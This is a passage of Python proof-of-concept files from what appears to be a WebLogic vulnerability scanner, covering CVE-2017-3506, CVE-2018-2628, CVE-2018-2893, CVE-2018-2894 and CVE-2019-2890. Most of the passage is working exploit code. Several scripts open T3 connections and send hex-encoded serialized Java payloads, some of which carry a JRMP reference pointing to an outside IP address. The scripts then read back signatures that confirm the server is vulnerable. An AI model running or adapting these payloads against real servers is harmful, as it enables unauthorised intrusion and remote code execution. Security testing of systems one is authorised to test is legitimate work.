'007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(rport)) 30 | data3 = '1a7727000d3234322e323134' 31 | data4 = '2e312e32353461863d1d0000000078' 32 | for d in [data1,data2,data3,data4]: 33 | sock.send(bytes.fromhex(d)) 34 | time.sleep(2) 35 | 36 | def sendEvilObjData(sock,data): 37 | payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000' 38 | payload+=data 39 | payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff' 40 | payload = '%s%s'%('{:08x}'.format(len(payload)//2 + 4),payload) 41 | sock.send(bytes.fromhex(payload)) 42 | res = '' 43 | try: 44 | count = 0 45 | while count<5: 46 | res += sock.recv(4096).decode("utf8","ignore") 47 | time.sleep(0.1) 48 | count += 1 49 | except Exception: 50 | pass 51 | return res 52 | 53 | def checkVul(res,rip,rport): 54 | p=re.findall(VER_SIG[0], res, re.S) 55 | if len(p)>0: 56 | return (1,'[+] [{}] weblogic has a JAVA deserialization vulnerability:{}'.format(rip+':'+str(rport),VUL[0])) 57 | else: 58 | return (0,'[-] [{}] weblogic not detected {}'.format(rip+':'+str(rport),VUL[0])) 59 | 60 | 61 | def run(rip,rport): 62 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 63 | sock.settimeout(10) 64 | server_addr = (rip, rport) 65 | t3handshake(sock,server_addr) 66 | buildT3RequestObject(sock,rport) 67 | rs=sendEvilObjData(sock,PAYLOAD[0]) 68 | return checkVul(rs,rip,rport) 69 | 70 | if __name__=="__main__": 71 | dip = sys.argv[1] 72 | dport = int(sys.argv[2]) 73 | run(dip,dport) -------------------------------------------------------------------------------- /poc/CVE_2017_3506.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # _*_ coding:utf-8 _*_ 3 | ''' 4 | ____ _ _ _ _ __ __ _ 5 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ 6 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / 7 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < 8 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ 9 | 10 | ''' 11 | import sys 12 | import requests 13 | import re 14 | from config.config_requests import ua 15 | 16 | VUL=['CVE-2017-3506'] 17 | headers = { 18 | "Accept-Language":"zh-CN,zh;q=0.9,en;q=0.8", 19 | "User-Agent":ua, 20 | "Content-Type":"text/xml" 21 | } 22 | 23 | def poc(u): 24 | url = "http://" + u 25 | url += '/wls-wsat/CoordinatorPortType' 26 | post_str = ''' 27 | 28 | 29 | 30 | 31 |

45 | 46 | 47 | 48 | 49 | 50 | ''' 51 | 52 | try: 53 | response = requests.post(url, data=post_str, verify=False, timeout=5, headers=headers) 54 | response = response.text 55 | response = re.search(r"\.*\<\/faultstring\>", response).group(0) 56 | except Exception: 57 | response = "" 58 | 59 | if 'java.lang.ProcessBuilder' in response or "0" in response: 60 | return (1,'[+] [{}] weblogic has a JAVA deserialization vulnerability:{}'.format(u,VUL[0])) 61 | else: 62 | return (0,'[-] [{}] weblogic not detected {}'.format(u,VUL[0])) 63 | 64 | 65 | 66 | def run(rip,rport): 67 | url=rip+':'+str(rport) 68 | return poc(url) 69 | 70 | if __name__ == '__main__': 71 | dip = sys.argv[1] 72 | dport = int(sys.argv[2]) 73 | run(dip,dport) -------------------------------------------------------------------------------- /poc/CVE_2018_2628.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # _*_ coding:utf-8 _*_ 3 | ''' 4 | ____ _ _ _ _ __ __ _ 5 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ 6 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / 7 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < 8 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ 9 | 10 | ''' 11 | import socket 12 | import sys 13 | import time 14 | import re 15 | 16 | VUL=['CVE-2018-2628'] 17 | PAYLOAD=['aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707737000a556e6963617374526566000e3130342e3235312e3232382e353000001b590000000001eea90b00000000000000000000000000000078'] 18 | VER_SIG=['\\$Proxy[0-9]+'] 19 | 20 | 21 | def t3handshake(sock,server_addr): 22 | sock.connect(server_addr) 23 | sock.send(bytes.fromhex('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a')) 24 | time.sleep(1) 25 | sock.recv(1024) 26 | 27 | def buildT3RequestObject(sock,rport): 28 | data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371' 29 | data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(rport)) 30 | data3 = '1a7727000d3234322e323134' 31 | data4 = '2e312e32353461863d1d0000000078' 32 | for d in [data1,data2,data3,data4]: 33 | sock.send(bytes.fromhex(d)) 34 | time.sleep(2) 35 | 36 | def sendEvilObjData(sock,data): 37 | payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000' 38 | payload+=data 39 | payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff' 40 | payload = '%s%s'%('{:08x}'.format(len(payload)//2 + 4),payload) 41 | sock.send(bytes.fromhex(payload)) 42 | res = '' 43 | try: 44 | count = 0 45 | while count<10: 46 | res += sock.recv(4096).decode("utf8","ignore") 47 | time.sleep(0.1) 48 | count += 1 49 | except Exception: 50 | pass 51 | return res 52 | def checkVul(res,rip,rport): 53 | p=re.findall(VER_SIG[0], res, re.S) 54 | if len(p)>0: 55 | return (1,'[+] [{}] weblogic has a JAVA deserialization vulnerability:{}'.format(rip+':'+str(rport),VUL[0])) 56 | else: 57 | return (0,'[-] [{}] weblogic not detected {}'.format(rip+':'+str(rport),VUL[0])) 58 | 59 | 60 | def run(rip,rport): 61 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 62 | sock.settimeout(20) 63 | server_addr = (rip, rport) 64 | t3handshake(sock,server_addr) 65 | buildT3RequestObject(sock,rport) 66 | rs=sendEvilObjData(sock,PAYLOAD[0]) 67 | return checkVul(rs,rip,rport) 68 | 69 | if __name__=="__main__": 70 | dip = sys.argv[1] 71 | dport = int(sys.argv[2]) 72 | run(dip,dport) -------------------------------------------------------------------------------- /poc/CVE_2018_2893.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # _*_ coding:utf-8 _*_ 3 | ''' 4 | ____ _ _ _ _ __ __ _ 5 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ 6 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / 7 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < 8 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ 9 | 10 | ''' 11 | import socket 12 | import time 13 | import re 14 | import sys 15 | 16 | 17 | VUL=['CVE-2018-2893'] 18 | PAYLOAD=['ACED0005737200257765626C6F6769632E6A6D732E636F6D6D6F6E2E53747265616D4D657373616765496D706C6B88DE4D93CBD45D0C00007872001F7765626C6F6769632E6A6D732E636F6D6D6F6E2E4D657373616765496D706C69126161D04DF1420C000078707A000001251E200000000000000100000118ACED0005737D00000001001A6A6176612E726D692E72656769737472792E5265676973747279787200176A6176612E6C616E672E7265666C6563742E50726F7879E127DA20CC1043CB0200014C0001687400254C6A6176612F6C616E672F7265666C6563742F496E766F636174696F6E48616E646C65723B78707372002D6A6176612E726D692E7365727665722E52656D6F74654F626A656374496E766F636174696F6E48616E646C657200000000000000020200007872001C6A6176612E726D692E7365727665722E52656D6F74654F626A656374D361B4910C61331E03000078707732000A556E696361737452656600093132372E302E302E310000F1440000000046911FD80000000000000000000000000000007878'] 19 | VER_SIG=['StreamMessageImpl'] 20 | 21 | 22 | def t3handshake(sock,server_addr): 23 | sock.connect(server_addr) 24 | sock.send(bytes.fromhex('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a')) 25 | time.sleep(1) 26 | sock.recv(1024) 27 | 28 | def buildT3RequestObject(sock,rport): 29 | data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371' 30 | data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(rport)) 31 | data3 = '1a7727000d3234322e323134' 32 | data4 = '2e312e32353461863d1d0000000078' 33 | for d in [data1,data2,data3,data4]: 34 | sock.send(bytes.fromhex(d)) 35 | time.sleep(2) 36 | 37 | def sendEvilObjData(sock,data): 38 | payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000' 39 | payload+=data 40 | payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff' 41 | payload = '%s%s'%('{:08x}'.format(len(payload)//2 + 4),payload) 42 | sock.send(bytes.fromhex(payload)) 43 | res = '' 44 | try: 45 | count = 0 46 | while count<5: 47 | res += sock.recv(4096).decode("utf8","ignore") 48 | time.sleep(0.1) 49 | count += 1 50 | except Exception: 51 | pass 52 | return res 53 | 54 | def checkVul(res,rip,rport): 55 | p=re.findall(VER_SIG[0], res, re.S) 56 | if len(p)>0: 57 | return (1,'[+] [{}] weblogic has a JAVA deserialization vulnerability:{}'.format(rip+':'+str(rport),VUL[0])) 58 | else: 59 | return (0,'[-] [{}] weblogic not detected {}'.format(rip+':'+str(rport),VUL[0])) 60 | 61 | 62 | def run(rip,rport): 63 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 64 | sock.settimeout(10) 65 | server_addr = (rip, rport) 66 | t3handshake(sock,server_addr) 67 | buildT3RequestObject(sock,rport) 68 | rs=sendEvilObjData(sock,PAYLOAD[0]) 69 | return checkVul(rs,rip,rport) 70 | 71 | if __name__=="__main__": 72 | dip = sys.argv[1] 73 | dport = int(sys.argv[2]) 74 | run(dip,dport) -------------------------------------------------------------------------------- /poc/CVE_2018_2894.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # _*_ coding:utf-8 _*_ 3 | ''' 4 | ____ _ _ _ _ __ __ _ 5 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ 6 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / 7 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < 8 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ 9 | 10 | ''' 11 | import sys 12 | import requests 13 | from config.config_requests import headers 14 | 15 | VUL=['CVE-2018-2894'] 16 | 17 | 18 | def islive(ur,port): 19 | url='http://' + str(ur)+':'+str(port)+'/ws_utc/begin.do' 20 | r1 = requests.get(url, headers=headers) 21 | url='http://' + str(ur)+':'+str(port)+'/ws_utc/config.do' 22 | r2 = requests.get(url, headers=headers) 23 | return r1.status_code,r2.status_code 24 | 25 | def run(rip,rport): 26 | a,b=islive(rip,rport) 27 | if a == 200 or b == 200: 28 | return (1, '[+] [{}] weblogic has a JAVA deserialization vulnerability:{}'.format(rip + ':' + str(rport), VUL[0])) 29 | else: 30 | return (0, '[-] [{}] weblogic not detected {}'.format(rip + ':' + str(rport), VUL[0])) 31 | 32 | if __name__=="__main__": 33 | url = sys.argv[1] 34 | port = int(sys.argv[2]) 35 | run(url,port) 36 | -------------------------------------------------------------------------------- /poc/CVE_2019_2890.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # _*_ coding:utf-8 _*_ 3 | ''' 4 | ____ _ _ _ _ __ __ _ 5 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ 6 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / 7 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < 8 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ 9 | ''' 10 | import socket 11 | import time 12 | import re 13 | import sys 14 | 15 | 16 | VUL=['CVE-2019-2890'] 17 | PAYLOAD=['aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707737000a556e6963617374526566000e3130342e3235312e3232382e353000001b590000000001eea90b00000000000000000000000000000078'] 18 | VER_SIG=['\\$Proxy[0-9]+'] 19 | 20 | 21 | def t3handshake(sock,server_addr): 22 | sock.connect(server_addr) 23 | sock.send(bytes.fromhex('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a')) 24 | time.sleep(1) 25 | sock.recv(1024) 26 | 27 | def buildT3RequestObject(sock,rport): 28 | data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371' 29 | data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(rport)) 30 | data3 = '1a7727000d3234322e323134' 31 | data4 = '2e312e32353461863d1d0000000078' 32 | for d in [data1,data2,data3,data4]: 33 | sock.send(bytes.fromhex(d)) 34 | time.sleep(2) 35 | 36 | def sendEvilObjData(sock,data): 37 | payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000' 38 | payload+=data 39 | payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff' 40 | payload = '%s%s'%('{:08x}'.format(len(payload)//2 + 4),payload) 41 | sock.send(bytes.fromhex(payload)) 42 | res = '' 43 | try: 44 | count = 0 45 | while count<5: 46 | res += sock.recv(4096).decode("utf8","ignore") 47 | time.sleep(0.1) 48 | count += 1 49 | except Exception: 50 | pass 51 | return res 52 | 53 | def checkVul(res,rip,rport): 54 | p=re.findall(VER_SIG[0], res, re.S) 55 | if len(p)>0: 56 | return (1,'[+] [{}] weblogic has a JAVA deserialization vulnerability:{}'.format(rip+':'+str(rport),VUL[0])) 57 | else: 58 | return (0,'[-] [{}] weblogic not detected {}'.format(rip+':'+str(rport),VUL[0])) 59 | 60 | 61 | def run(rip,rport): 62 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 63 | sock.settimeout(10) 64 | server_addr = (rip, rport) 65 | t3handshake(sock,server_addr) 66 | buildT3RequestObject(sock,rport) 67 | rs=sendEvilObjData(sock,PAYLOAD[0]) 68 | return checkVul(rs,rip,rport) 69 | 70 | if __name__=="__main__": 71 | dip = sys.argv[1] 72 | dport = int(sys.argv[2]) 73 | run(dip,dport) -------------------------------------------------------------------------------- /poc/Console.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # _*_ coding:utf-8 _*_ 3 | ''' 4 | ____ _ _ _ _ __ __ _ 5 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ 6 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / 7 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < 8 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ 9 | 10 | ''' 11 | import sys 12 | import requests 13 | from config.config_requests import headers 14 | 15 | 16 | def islive(ur,port): 17 | url='http://' + str(ur)+':'+str(port)+'/console/login/LoginForm.jsp' 18 | r = requests.get(url, headers=headers) 19 | return r.status_code 20 | 21 | def run(url,port): 22 | if islive(url,port)==200: 23 | u='http://' + str(url)+':'+str(port)+'/console/login/LoginForm.jsp' 24 | return 